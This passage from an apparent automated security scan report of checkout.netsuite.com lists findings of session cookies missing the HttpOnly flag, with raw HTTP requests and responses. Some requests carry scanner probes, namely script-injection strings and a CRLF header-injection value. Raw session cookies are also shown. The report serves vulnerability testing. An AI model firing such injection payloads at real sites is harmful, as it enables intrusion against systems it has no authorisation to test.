Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: evlu=8046e9fe-2ba6-4040-b3b9-5d1af9c46888
If-None-Match: "0-gzip"

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=D12D472907FE3E04E0769EB34E0D8495; Path=/
ETag: "0-gzip"
Cache-Control: must-revalidate, max-age=0
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM"
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 25 Apr 2011 14:23:16 GMT
Connection: close

if(typeof __ADXPOSE_CONTAINERS__==="undefined"){__ADXPOSE_CONTAINERS__={}}if(typeof __ADXPOSE_EVENT_QUEUES__==="undefined"){__ADXPOSE_EVENT_QUEUES__={}}if(typeof __adxpose__getOffset__==="undefined"){
...[SNIP]...
17.3. https://checkout.netsuite.com/Netsparker00c59262f08b40d59cb0f0d3fa4e17ed.nl  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://checkout.netsuite.com
Path:   /Netsparker00c59262f08b40d59cb0f0d3fa4e17ed.nl

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Netsparker00c59262f08b40d59cb0f0d3fa4e17ed.nl HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: checkout.netsuite.com
Cookie: JSESSIONID=dr9LN1Gcsnv0hQn9pSF9dZtY69V5GT6wWLx5pbn5zqyTN5K0By5hSnyCLpkp16zsn8jTQzcvVTNZSwMD4mG6WZmpmLChGK6FncvhBpQv6KGffqpM2fHyGlYVz2GpQM2Y!-979559123; NLVisitorId=rcHW8495AYoCDqLY; NLShopperId=rcHW8495AXICDie_; NS_VER=2011.1.0
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 206 Partial Content
Date: Mon, 25 Apr 2011 15:09:26 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: -2144347290:616363742D6A6176613032302E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=L0xGN1TCcVCQPS8pHhg9qBGd76gpyCfS7FnHbzfnFl2LQNGjJvrzfh6fNyfBxr6h2LllvDnWDV1VRT3fh8GLJQYNFyskhxdG51gGXN5XF7N0GMrVt0mxL6vQyQSnT8pW!-979559123; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 2024

<html><head><title>Notice</title>
<meta http-equiv='Content-Type' content='text/html; charset=UTF-8'>
<link rel='stylesheet' href='/core/styles/pagestyles.nl?ct=-2&bglt=F2F4F6&bgmd=EDF1F7&bgdk=737A82&
...[SNIP]...
17.4. https://checkout.netsuite.com/Netsparker3f4e2bee979c4108be6e7c378faf29fa.nl  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://checkout.netsuite.com
Path:   /Netsparker3f4e2bee979c4108be6e7c378faf29fa.nl

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Netsparker3f4e2bee979c4108be6e7c378faf29fa.nl HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: checkout.netsuite.com
Cookie: JSESSIONID=dr9LN1Gcsnv0hQn9pSF9dZtY69V5GT6wWLx5pbn5zqyTN5K0By5hSnyCLpkp16zsn8jTQzcvVTNZSwMD4mG6WZmpmLChGK6FncvhBpQv6KGffqpM2fHyGlYVz2GpQM2Y!-979559123; NLVisitorId=rcHW8495AYoCDqLY; NLShopperId=rcHW8495AXICDie_; NS_VER=2011.1.0
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 206 Partial Content
Date: Mon, 25 Apr 2011 15:07:48 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: 2000683563:616363742D6A6176613032302E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=2RW7N1TCBHr6mQJSv4MJrzV9rnyz359DTygvK7qTzvf13vCc2x2x2JXm5QLhrNbJJQcTCgFLGHhsGp0VQ7FwRJ4b5TpDvcFrLL1Jh18S7vw1h5R7dYbgwShCL6v1QX0C!-979559123; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 2024

<html><head><title>Notice</title>
<meta http-equiv='Content-Type' content='text/html; charset=UTF-8'>
<link rel='stylesheet' href='/core/styles/pagestyles.nl?ct=-2&bglt=F2F4F6&bgmd=EDF1F7&bgdk=737A82&
...[SNIP]...
17.5. https://checkout.netsuite.com/Netsparkerd83f087f78ee474db97e8aec33de63c2.nl  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://checkout.netsuite.com
Path:   /Netsparkerd83f087f78ee474db97e8aec33de63c2.nl

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Netsparkerd83f087f78ee474db97e8aec33de63c2.nl HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: checkout.netsuite.com
Cookie: JSESSIONID=dr9LN1Gcsnv0hQn9pSF9dZtY69V5GT6wWLx5pbn5zqyTN5K0By5hSnyCLpkp16zsn8jTQzcvVTNZSwMD4mG6WZmpmLChGK6FncvhBpQv6KGffqpM2fHyGlYVz2GpQM2Y!-979559123; NLVisitorId=rcHW8495AYoCDqLY; NLShopperId=rcHW8495AXICDie_; NS_VER=2011.1.0
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 206 Partial Content
Date: Mon, 25 Apr 2011 15:10:47 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: -110553779:616363742D6A6176613032302E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=6gtrN1TV8C9xXWGTLVWNMvDTBLMyV755hCYflZPh1YC9G3WhlHnpqmr03yRfTfPYQpX2lCD12TQ2p4sh2qzn2CRFHBYp2ypxXQ0Ts2HJkxK7TM4GT0WGNXlr2vhsWDqh!-979559123; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 2024

<html><head><title>Notice</title>
<meta http-equiv='Content-Type' content='text/html; charset=UTF-8'>
<link rel='stylesheet' href='/core/styles/pagestyles.nl?ct=-2&bglt=F2F4F6&bgmd=EDF1F7&bgdk=737A82&
...[SNIP]...
17.6. https://checkout.netsuite.com/core/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://checkout.netsuite.com
Path:   /core/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /core/?nsextt=%00%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker(0x000013)%3C%2Fscript%3E HTTP/1.1
Referer: https://checkout.netsuite.com/core/styles/pagestyles.nl?ct=-2&bglt=F2F4F6&bgmd=EDF1F7&bgdk=737A82&bgon=5C7499&bgoff=AFB5BF&bgbar=5C7499&tasktitletext=E4EAF4&crumbtext=C4C8CF&headertext=B5C1D5&ontab=FFFFFF&offtab=000000&text=000000&link=000000&bgbody=FFFFFF&bghead=FFFFFF&portlet=C0CAD9&portletlabel=000000&bgbutton=FFE599&bgrequiredfld=FFFFE5&font=Verdana%2CHelvetica%2Csans-serif&size_site_content=9pt&size_site_title=9pt&size=1.0&nlinputstyles=T&NS_VER=2011.1.0&3
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: checkout.netsuite.com
Cookie: JSESSIONID=31PwN1GWQvkMGP2pxGGpgHN2m48g811ybT9HCcv4R2jvLCt8R9y21ywBzs7v4v6KSnRPhyDpZb218XYJ9jkhnLpJpr8m7pxCsyyXnPNz1ChxGGXdMyLzThLVm6jGBpVG!1490567172; NLVisitorId=rcHW8495AYoCDqLY; NLShopperId=rcHW8495AXICDie_; NS_VER=2011.1.0
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:27:05 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: 333241087:616363742D6A6176613031312E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=hWd4N1GZGdsflwhjP8VdVGSnB6r2GzJ3SBh92hgS8gqlwWGNvByZJhtmP17wL8Hj9JwLc1dn5gjrrtXLMVZXhDnw7vvQwTP4mMBtPt3ds55G4vp4gF1Zr97r3DHpyLCR!-1220802186; path=/
Set-Cookie: NLShopperId=rcHW8495AXICDie_; domain=checkout.netsuite.com; expires=Monday, 02-May-2011 14:27:05 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 2650


<html>
<head>
<title>Checkout</title>
<link rel='stylesheet' href='/core/styles/pagestyles.nl?ct=-2&bglt=F2F4F6&bgmd=EDF1F7&bgdk=737A82&bgon=5C7499&bgoff=AFB5BF&bgbar=5C7499&tasktitletext=E4EAF4&crum
...[SNIP]...
17.7. https://checkout.netsuite.com/core/media/Netsparker2f675cb9691f4d6caba2349e5f5a7d63.nl  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://checkout.netsuite.com
Path:   /core/media/Netsparker2f675cb9691f4d6caba2349e5f5a7d63.nl

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /core/media/Netsparker2f675cb9691f4d6caba2349e5f5a7d63.nl HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: checkout.netsuite.com
Cookie: JSESSIONID=dr9LN1Gcsnv0hQn9pSF9dZtY69V5GT6wWLx5pbn5zqyTN5K0By5hSnyCLpkp16zsn8jTQzcvVTNZSwMD4mG6WZmpmLChGK6FncvhBpQv6KGffqpM2fHyGlYVz2GpQM2Y!-979559123; NLVisitorId=rcHW8495AYoCDqLY; NLShopperId=rcHW8495AXICDie_; NS_VER=2011.1.0
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 206 Partial Content
Date: Mon, 25 Apr 2011 15:08:12 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: -368749109:616363742D6A6176613032302E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=9pncN1TcCnWLkfJJbLpSq1RR7PL6tyTTw0hR5QMhqLwnSDCyGTFJxJhYwyJYDpG2wJdSpSJy1FLV6lXT1thXwK1jrhJvlSP8KCMDHGZd8DVZ2nQZC2pLR3HTpPgQDCQp!-979559123; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 2024

<html><head><title>Notice</title>
<meta http-equiv='Content-Type' content='text/html; charset=UTF-8'>
<link rel='stylesheet' href='/core/styles/pagestyles.nl?ct=-2&bglt=F2F4F6&bgmd=EDF1F7&bgdk=737A82&
...[SNIP]...
17.8. https://checkout.netsuite.com/core/media/Netsparker3966cc21ff2a48c3b65f2ea6026a480e.nl  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://checkout.netsuite.com
Path:   /core/media/Netsparker3966cc21ff2a48c3b65f2ea6026a480e.nl

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /core/media/Netsparker3966cc21ff2a48c3b65f2ea6026a480e.nl HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: checkout.netsuite.com
Cookie: JSESSIONID=dr9LN1Gcsnv0hQn9pSF9dZtY69V5GT6wWLx5pbn5zqyTN5K0By5hSnyCLpkp16zsn8jTQzcvVTNZSwMD4mG6WZmpmLChGK6FncvhBpQv6KGffqpM2fHyGlYVz2GpQM2Y!-979559123; NLVisitorId=rcHW8495AYoCDqLY; NLShopperId=rcHW8495AXICDie_; NS_VER=2011.1.0
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 206 Partial Content
Date: Mon, 25 Apr 2011 15:07:31 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: -812652053:616363742D6A6176613032302E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=JwDGN1TRX3qFJhPv0tBSnhLkTmpW34vhDRvgTkwqLXK4SnvMG3VM1xdGYpsFmKLXPJGL5yG5Lk8PK7KS4HKnfNNzcdJH2J9GRhFDsWdQlvhZyXNFZGnBbnGLKb2GLgXj!-979559123; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 2024

<html><head><title>Notice</title>
<meta http-equiv='Content-Type' content='text/html; charset=UTF-8'>
<link rel='stylesheet' href='/core/styles/pagestyles.nl?ct=-2&bglt=F2F4F6&bgmd=EDF1F7&bgdk=737A82&
...[SNIP]...
17.9. https://checkout.netsuite.com/core/media/Netsparkere27d76ce16c84ccb9270fd25e2ba9535.nl  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://checkout.netsuite.com
Path:   /core/media/Netsparkere27d76ce16c84ccb9270fd25e2ba9535.nl

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /core/media/Netsparkere27d76ce16c84ccb9270fd25e2ba9535.nl HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: checkout.netsuite.com
Cookie: JSESSIONID=dr9LN1Gcsnv0hQn9pSF9dZtY69V5GT6wWLx5pbn5zqyTN5K0By5hSnyCLpkp16zsn8jTQzcvVTNZSwMD4mG6WZmpmLChGK6FncvhBpQv6KGffqpM2fHyGlYVz2GpQM2Y!-979559123; NLVisitorId=rcHW8495AYoCDqLY; NLShopperId=rcHW8495AXICDie_; NS_VER=2011.1.0
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 206 Partial Content
Date: Mon, 25 Apr 2011 15:09:35 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: -110558500:616363742D6A6176613032302E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=C9RcN1TT8snZLj3J8hCcFmJpQ654HjYQZ4F5LCvBvTZ29f1ZnThL0wQpBFWf522QQvf7TN89dBTvLfjsSzfJD1yGKG3D0xhy3Ryv7M0c6rzkzZB1SlWMFLwchzvhwnV2!-979559123; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 2024

<html><head><title>Notice</title>
<meta http-equiv='Content-Type' content='text/html; charset=UTF-8'>
<link rel='stylesheet' href='/core/styles/pagestyles.nl?ct=-2&bglt=F2F4F6&bgmd=EDF1F7&bgdk=737A82&
...[SNIP]...
17.10. https://checkout.netsuite.com/core/styles/Netsparker5d6e89379b044629864a1acadeba968b.nl  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://checkout.netsuite.com
Path:   /core/styles/Netsparker5d6e89379b044629864a1acadeba968b.nl

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /core/styles/Netsparker5d6e89379b044629864a1acadeba968b.nl HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: checkout.netsuite.com
Cookie: JSESSIONID=dr9LN1Gcsnv0hQn9pSF9dZtY69V5GT6wWLx5pbn5zqyTN5K0By5hSnyCLpkp16zsn8jTQzcvVTNZSwMD4mG6WZmpmLChGK6FncvhBpQv6KGffqpM2fHyGlYVz2GpQM2Y!-979559123; NLVisitorId=rcHW8495AYoCDqLY; NLShopperId=rcHW8495AYQCDmZk; NS_VER=2011.1.0
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 206 Partial Content
Date: Mon, 25 Apr 2011 15:04:40 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: -110576631:616363742D6A6176613032302E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=MKB8N1NDfnQgHZLLbYDLh4z8yFybC5QDpN14nhTHyDDLBGWlh1d9yCB5hmlfvFCpH1Y1YByvTLKmHv2s5tFSs0FxbnfmZJM1Zpdqds57MzgTGCMyNN5C3zzpW0WtRYhQ!-979559123; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 2024

<html><head><title>Notice</title>
<meta http-equiv='Content-Type' content='text/html; charset=UTF-8'>
<link rel='stylesheet' href='/core/styles/pagestyles.nl?ct=-2&bglt=F2F4F6&bgmd=EDF1F7&bgdk=737A82&
...[SNIP]...
17.11. https://checkout.netsuite.com/core/styles/Netsparkera2b9f56d99bc43aa9ec216d3c99aa80b.nl  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://checkout.netsuite.com
Path:   /core/styles/Netsparkera2b9f56d99bc43aa9ec216d3c99aa80b.nl

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /core/styles/Netsparkera2b9f56d99bc43aa9ec216d3c99aa80b.nl HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: checkout.netsuite.com
Cookie: JSESSIONID=dr9LN1Gcsnv0hQn9pSF9dZtY69V5GT6wWLx5pbn5zqyTN5K0By5hSnyCLpkp16zsn8jTQzcvVTNZSwMD4mG6WZmpmLChGK6FncvhBpQv6KGffqpM2fHyGlYVz2GpQM2Y!-979559123; NLVisitorId=rcHW8495AYoCDqLY; NLShopperId=rcHW8495AXICDie_; NS_VER=2011.1.0
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 206 Partial Content
Date: Mon, 25 Apr 2011 15:08:36 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: 1112884952:616363742D6A6176613032302E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=kpy0N1TTsKDkPgBGQZchFwhNP2xxQDtJvfwQVvtynWwgQLL0vwPLg1KTvflJQHp8yCnphBG9nfKqGrnvy0Cy2pxD6Br4LW1B7KYyndJyk1mBF7whWgydLzFw85SwJwvl!-979559123; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 2024

<html><head><title>Notice</title>
<meta http-equiv='Content-Type' content='text/html; charset=UTF-8'>
<link rel='stylesheet' href='/core/styles/pagestyles.nl?ct=-2&bglt=F2F4F6&bgmd=EDF1F7&bgdk=737A82&
...[SNIP]...
17.12. https://checkout.netsuite.com/core/styles/Netsparkerb8e355f2184b49a497b4b297f62d93f9.nl  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://checkout.netsuite.com
Path:   /core/styles/Netsparkerb8e355f2184b49a497b4b297f62d93f9.nl

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /core/styles/Netsparkerb8e355f2184b49a497b4b297f62d93f9.nl HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: checkout.netsuite.com
Cookie: JSESSIONID=dr9LN1Gcsnv0hQn9pSF9dZtY69V5GT6wWLx5pbn5zqyTN5K0By5hSnyCLpkp16zsn8jTQzcvVTNZSwMD4mG6WZmpmLChGK6FncvhBpQv6KGffqpM2fHyGlYVz2GpQM2Y!-979559123; NLVisitorId=rcHW8495AYoCDqLY; NLShopperId=rcHW8495AXICDie_; NS_VER=2011.1.0
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 206 Partial Content
Date: Mon, 25 Apr 2011 15:07:38 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: -2144353504:616363742D6A6176613032302E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=pmQ9N1TXzfvBjH2mhF3Q1jKgWhcfCCjndsRvYYL3lv5kb0VQfGTyhhQQQbjmYcLvyCNhp8Kf20GD1QlTR1F2jfcsTn5Lr1hW0SLCmSrGVSrcZnXL5rhglQsqv9ZFVhG2!-979559123; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 2024

<html><head><title>Notice</title>
<meta http-equiv='Content-Type' content='text/html; charset=UTF-8'>
<link rel='stylesheet' href='/core/styles/pagestyles.nl?ct=-2&bglt=F2F4F6&bgmd=EDF1F7&bgdk=737A82&
...[SNIP]...
17.13. https://checkout.netsuite.com/core/styles/pagestyles.nl  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://checkout.netsuite.com
Path:   /core/styles/pagestyles.nl

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /core/styles/pagestyles.nl?ct=http://example.com/%3f%0D%0Ans:%20netsparker056650=vuln&bglt=F2F4F6&bgmd=EDF1F7&bgdk=737A82&bgon=5C7499&bgoff=AFB5BF&bgbar=5C7499&tasktitletext=E4EAF4&crumbtext=C4C8CF&headertext=B5C1D5&ontab=FFFFFF&offtab=000000&text=000000&link=000000&bgbody=FFFFFF&bghead=FFFFFF&portlet=C0CAD9&portletlabel=000000&bgbutton=FFE599&bgrequiredfld=FFFFE5&font=Verdana%2CHelvetica%2Csans-serif&size_site_content=9pt&size_site_title=9pt&size=1.0&nlinputstyles=T&NS_VER=2011.1.0&3=3 HTTP/1.1
Referer: https://checkout.netsuite.com/s.nl?c=438708&sc=4&whence=&n=1&ext=T
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: checkout.netsuite.com
Cookie: JSESSIONID=dr9LN1Gcsnv0hQn9pSF9dZtY69V5GT6wWLx5pbn5zqyTN5K0By5hSnyCLpkp16zsn8jTQzcvVTNZSwMD4mG6WZmpmLChGK6FncvhBpQv6KGffqpM2fHyGlYVz2GpQM2Y!-979559123; NLVisitorId=rcHW8495AYoCDqLY; NLShopperId=rcHW8495AXICDie_; NS_VER=2010.2.0
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:27:02 GMT
Server: Apache
Expires: Tue, 26 Apr 2011 06:15:02 GMT
Last-Modified: Mon, 25 Apr 2011 14:27:02 GMT
NS_RTIMER_COMPOSITE: -1134201633:616363742D6A6176613036312E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=tXQJN1GWSQGJhxgnQLglP9K2nC3JgRj49hbDh6pTpzfsTnRKQQ1Dk0D1X5PfwJGyCLhxyJQfpJxpGHzCJV4sK1VsMCzpln6GNyht1gnPJpDGpHp3rdQFqyYz8rzCzbJN!-1435542349; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/css; charset=UTF-8
Content-Length: 67958

.iArrowLeft, .iArrowRight { display:inline-block; height:15px; width:16px; margin: 0 2px; background: url(/images/chiles/dashboard_icons.png) no-repeat; text-decoration: none; zoom:1}
.iArrowLeft { ma
...[SNIP]...
17.14. https://checkout.netsuite.com/pages/portal/css/main.css  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://checkout.netsuite.com
Path:   /pages/portal/css/main.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pages/portal/css/main.css?nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00007E)%3C/script%3E HTTP/1.1
Referer: https://checkout.netsuite.com/pages/portal/page_not_found.jsp?internal=F
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: checkout.netsuite.com
Cookie: JSESSIONID=fspzN1GhTphyBQvLpyGdlJdh6BL8whyTwq2X78f8hxRthNWT2Z3jy4GGPSzLlnVZdyGJQxSTzT2hfvnn6y9XwhnznRTRZbMw6QGzXJcyQ2jBFp97np87tTDKTCTHXpxD!-1598522165; NLVisitorId=rcHW8495AYoCDqLY; NLShopperId=rcHW8495AXICDie_; NS_VER=2011.1.0
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 15:12:54 GMT
Server: Apache
Accept-Ranges: bytes
Last-Modified: Sat, 23 Apr 2011 00:28:30 GMT
NS_RTIMER_COMPOSITE: 225122148:616363742D6A6176613031362E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=2ln9N1PQC1pBlnRWMG11FTSzZ6Q7LFs2lFNbJYnZ9dvJs5NzSj9RQKLJB0jQbCcLrsWnHTJhh0vdnB0mgnkmGyrxYmLv5WCDzrjppnpZy6JLTGMDpZ7c9R9LvKTjTMqt!-1598522165; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/css
Content-Length: 2044

td, p        {
   font-family: Verdana, Arial, Helvetica, sans-serif;
   color: #333333;
   font-size: 11px;
}

.blueSubhead        {
   font-family: Verdana, Arial, Helvetica, sans-serif;
   color: #004584;
   font-weight:
...[SNIP]...
17.15. https://checkout.netsuite.com/pages/portal/page_not_found.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://checkout.netsuite.com
Path:   /pages/portal/page_not_found.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pages/portal/page_not_found.jsp?internal=F HTTP/1.1
Referer: https://checkout.netsuite.com/s.nl?c=438708&sc=4&whence=&n=1&ext=T
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: checkout.netsuite.com
Cookie: JSESSIONID=dr9LN1Gcsnv0hQn9pSF9dZtY69V5GT6wWLx5pbn5zqyTN5K0By5hSnyCLpkp16zsn8jTQzcvVTNZSwMD4mG6WZmpmLChGK6FncvhBpQv6KGffqpM2fHyGlYVz2GpQM2Y!-979559123; NLVisitorId=rcHW8495AYoCDqLY; NLShopperId=rcHW8495AXICDie_; NS_VER=2010.2.0
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:26:59 GMT
Server: Apache
NS_RTIMER_COMPOSITE: -690374290:616363742D6A6176613038362E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=0K8PN1GJqgGn0JkkHrzfLxHcVjNhkHczxJ5J34JfcXdnJGwzK09nybznnTnCvp8D498vLcRWvvh2CF7BJVDVQrVtHmgnlt8tVTVJzTsP1cDqMsf7gd27xTwt1BJB9BL4!-1927254259; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 11320


<html><head><title>NetSuite | Page Not Found</title>
<meta name="robots" content="noindex,nofollow">
<link rel="STYLESHEET" type="text/css" href="/pages/portal/css/main.css">
</head>
<body bgcolor
...[SNIP]...
17.16. https://checkout.netsuite.com/s.nl  previous  next

Summary

Severity:   Low
